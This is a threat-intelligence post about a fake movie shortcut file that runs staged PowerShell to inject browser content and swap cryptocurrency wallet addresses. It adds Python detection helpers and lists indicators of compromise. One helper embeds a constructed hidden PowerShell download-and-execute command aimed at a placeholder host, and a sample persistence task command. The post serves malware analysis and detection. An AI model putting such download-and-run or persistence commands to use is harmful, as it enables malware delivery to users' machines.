
TAU Threat Intelligence Notification – Fake Movie File Attack Targeting Cryptocurrency

2019-02-11 13:52:54
Ryan Murphy
www.carbonblack.com

A malicious Windows shortcut file is posing as a movie available on a torrent site. Its payload is used to conduct web injection, ultimately targeting the victim's web searches in browsers such as Chrome, Firefox and Internet Explorer. The payload also has the ability to search for and steal cryptocurrency located on the victim's system.

[Image: fig1.png]

Figure 1: .LNK Windows shortcut file with malicious PowerShell

The attack is initiated by the PowerShell command listed in the Target field of the Windows shortcut file (shown in the image above). The image below shows the PowerShell command in its entirety.

[Image: fig2.png]

Figure 2: Malicious PowerShell from .LNK

The command is obfuscated by storing the method type and C2 in a decimal-encoded array.

It then downloads the rest of the PowerShell payload via shortened URLs that redirect to Pastebin. The final stage is the web-inject and cryptocurrency stealer component, which is downloaded onto the system. The payload creates a scheduled task named "Smart Monitoring" as its persistence mechanism.
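As an added example (not code from the Carbon Black post), the following Python helper shows how an analyst can recover the strings hidden in a decimal-encoded character array of a captured PowerShell command line, and how to flag creation of the "Smart Monitoring" scheduled task in process-creation command lines. The sample command line and process records are constructed for this example; the C2 URL in them is a placeholder, not the real sample's contents.

```python
import re

# Constructed sample in the style described above: the method name and the
# C2 URL are stored as decimal-encoded char arrays that the script rebuilds
# into strings at runtime. The domain is a placeholder (.invalid TLD).
SAMPLE_CMDLINE = (
    "powershell -w hidden -c \"$m=[char[]](68,111,119,110,108,111,97,100,"
    "83,116,114,105,110,103) -join '';"
    "$u=[char[]](104,116,116,112,58,47,47,99,50,46,101,120,97,109,112,108,"
    "101,46,105,110,118,97,108,105,100,47,49) -join '';"
    "iex (New-Object Net.WebClient).$m($u)\""
)

# A parenthesised list of four or more small decimal numbers.
DECIMAL_ARRAY = re.compile(r"\(\s*(\d{1,3}(?:\s*,\s*\d{1,3}){3,})\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)


def decode_decimal_arrays(cmdline):
    """Return every decimal-encoded character array in cmdline decoded to text.

    Arrays whose values are not all printable ASCII are ignored, which keeps
    ordinary numeric argument lists out of the result.
    """
    decoded = []
    for m in DECIMAL_ARRAY.finditer(cmdline):
        codes = [int(x) for x in m.group(1).split(",")]
        if all(32 <= c < 127 for c in codes):
            decoded.append("".join(chr(c) for c in codes))
    return decoded


def extract_c2(cmdline):
    """URLs that only become visible after the decimal arrays are decoded."""
    return [u for s in decode_decimal_arrays(cmdline) for u in URL_RE.findall(s)]


# Constructed process-creation records (command lines only). The first mimics
# the persistence step reported in the post; the second is a benign task.
SAMPLE_PROCESS_EVENTS = [
    'schtasks.exe /Create /SC MINUTE /MO 5 /TN "Smart Monitoring" '
    '/TR "powershell -w hidden -c ..."',
    'schtasks.exe /Create /SC DAILY /TN "Adobe Acrobat Update Task" '
    '/TR "C:\\Program Files\\Common Files\\Adobe\\ARM\\1.0\\AdobeARM.exe"',
]

# Task name taken from the post; compared case-insensitively.
SUSPICIOUS_TASK_NAMES = {"smart monitoring"}
TASK_NAME_RE = re.compile(r'/tn\s+"?([^"/]+?)"?\s+/', re.IGNORECASE)


def find_persistence_task(cmdlines):
    """Return the task names from schtasks /Create command lines that match
    the known-bad list."""
    hits = []
    for line in cmdlines:
        if "schtasks" not in line.lower() or "/create" not in line.lower():
            continue
        m = TASK_NAME_RE.search(line)
        if m and m.group(1).strip().lower() in SUSPICIOUS_TASK_NAMES:
            hits.append(m.group(1).strip())
    return hits


if __name__ == "__main__":
    print("decoded strings:", decode_decimal_arrays(SAMPLE_CMDLINE))
    print("hidden URLs:    ", extract_c2(SAMPLE_CMDLINE))
    print("bad tasks:      ", find_persistence_task(SAMPLE_PROCESS_EVENTS))
```

The decoder is deliberately loose: it accepts any parenthesised run of small integers and keeps only those that decode to printable text, so it also surfaces obfuscated strings in scripts that build them with `[char[]]` and `-join`, as here, or with `[string]::Join` and similar constructions. In an EDR or SIEM pipeline the same two functions would run over process-creation events (command line plus parent process) rather than over the constructed samples.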

[Image: fig3.png]

Figure 3: Before web injection

[Image: fig4.png]

Figure 4: After web injection

The two images above demonstrate the result of the web-injected browser content. In this scenario it injects a fake Wikipedia donation message box into the browser on the infected machine. The code also manipulates the user's search engine results.

[Image: fig5.png]

Figure 5: Fake Wikipedia donation Bitcoin wallet address

The above image shows the Bitcoin "donation" being transferred from the fake Wikipedia donation Bitcoin address. At the time of this blog post, the value of the account was $27 (USD).

[Image: fig6.png]

Figure 6: JavaScript injected in browser to replace Bitcoin and Ethereum address

In addition to the web injection and web search result poisoning, the malware monitors web pages for Bitcoin and Ethereum addresses and replaces them with wallet addresses controlled by the attackers. The image above shows a portion of the code responsible for the wallet address replacement.
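One way a web integrity monitor can catch this class of injection, written as an added Python example rather than code from the post: extract every Bitcoin and Ethereum address from the HTML the server actually sent and from the DOM the browser ended up rendering, and report any address that appears only in the rendered copy. The Bitcoin checksum check uses the standard Base58Check scheme (SHA-256 twice over the version byte and hash, first four bytes). The served and rendered pages below are constructed; the Bitcoin address in the served copy is the well-known public genesis-block address, and the Ethereum strings are made-up hex values.

```python
import hashlib
import re

# Legacy Base58 Bitcoin addresses ('1' or '3' prefix) and 0x-prefixed Ethereum
# addresses. Bech32 ('bc1...') addresses are out of scope for this example.
BTC_RE = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")
ETH_RE = re.compile(r"\b0x[0-9a-fA-F]{40}\b")
BASE58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58_decode(s):
    """Decode a Base58 string to bytes; None if it contains invalid characters."""
    n = 0
    for ch in s:
        idx = BASE58_ALPHABET.find(ch)
        if idx < 0:
            return None
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    leading_zero_bytes = len(s) - len(s.lstrip("1"))  # each leading '1' is a 0x00 byte
    return b"\x00" * leading_zero_bytes + body


def btc_checksum_ok(addr):
    """True if addr is a 25-byte Base58Check payload with a valid checksum."""
    raw = base58_decode(addr)
    if raw is None or len(raw) != 25:
        return False
    payload, checksum = raw[:-4], raw[-4:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def wallet_addresses(text):
    """Set of Bitcoin and Ethereum address-like strings found in text."""
    return set(BTC_RE.findall(text)) | set(ETH_RE.findall(text))


def detect_address_swap(served_html, rendered_html):
    """Addresses present in the rendered DOM that the server never sent.

    Each hit carries the Base58Check result for Bitcoin addresses (None for
    Ethereum, whose EIP-55 check needs Keccak-256 and is omitted here).
    """
    injected = wallet_addresses(rendered_html) - wallet_addresses(served_html)
    return [
        {
            "address": a,
            "valid_checksum": None if a.startswith("0x") else btc_checksum_ok(a),
        }
        for a in sorted(injected)
    ]


# Constructed pages. SERVED is what the web server delivered; RENDERED is what
# the browser shows after an injected script rewrote the donation addresses.
GENESIS_BTC = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"  # public genesis-block address
SERVED_HTML = (
    "<p>Donate BTC: " + GENESIS_BTC + "</p>"
    "<p>Donate ETH: 0x" + "ab" * 20 + "</p>"
)
RENDERED_HTML = (
    "<p>Donate BTC: 1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2</p>"
    "<p>Donate ETH: 0x" + "cd" * 20 + "</p>"
)

if __name__ == "__main__":
    for hit in detect_address_swap(SERVED_HTML, RENDERED_HTML):
        print("address not in served page:", hit)
```

Comparing served content against the rendered DOM is what separates a genuine server-side change from an in-browser rewrite, which is the behaviour the injected JavaScript in Figure 6 relies on. The checksum result matters for triage: an attacker's replacement address will normally pass Base58Check, while a regex hit that fails it is more likely a false positive such as a random Base58-looking token.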

[Image: fig7.png]

Figure 7: Threat actor’s Stikked page

The image above shows that the attack has been running for at least a month and that the PowerShell script has been downloaded more than 21,000 times.

If you are a Carbon Black customer and are looking for more information on how CB products defend against this attack, click here.

Indicators of Compromise (IOCs)

Indicator | Type | Context
---|---|---
3b4ec70681e528663dee39c5c6ebceec2b7ddf09707a78df20cae3b7b807fac5 | SHA256 | LNK Sample
5d357f666e7727b18f8150d53d28d257 | MD5 | LNK Sample
094b703ae10cc35826aa30f7f57ab39cad571459a922721a48113a4536c92a02 | SHA256 | Web injector
12fe26e33008d89783088e130bb76ded | MD5 | Web injector
hxxp://klis.icu/1 | URL | Stage 1 PowerShell
hxxp://klis.icu/2 | URL | Stage 2 PowerShell
hxxp://klis.icu/3 | URL | Stage 3 PowerShell
hxxps://pastebin.com/raw/GbDcvb9u | URL | Stage 1 PowerShell
hxxps://pastebin.com/raw/jqZ8XC6D | URL | Stage 2 PowerShell
hxxps://pastebin.com/raw/inuZ4RrV | URL | Stage 3 PowerShell
hxxp://qgb.us/view/raw/76d115b1 | URL | Dropper Link
hxxp://qgb.us/view/raw/41cd6acf | URL | Dropper Link
happybpromo.info | URL | C2

The post TAU Threat Intelligence Notification - Fake Movie File Attack Targeting Cryptocurrency appeared first on Carbon Black.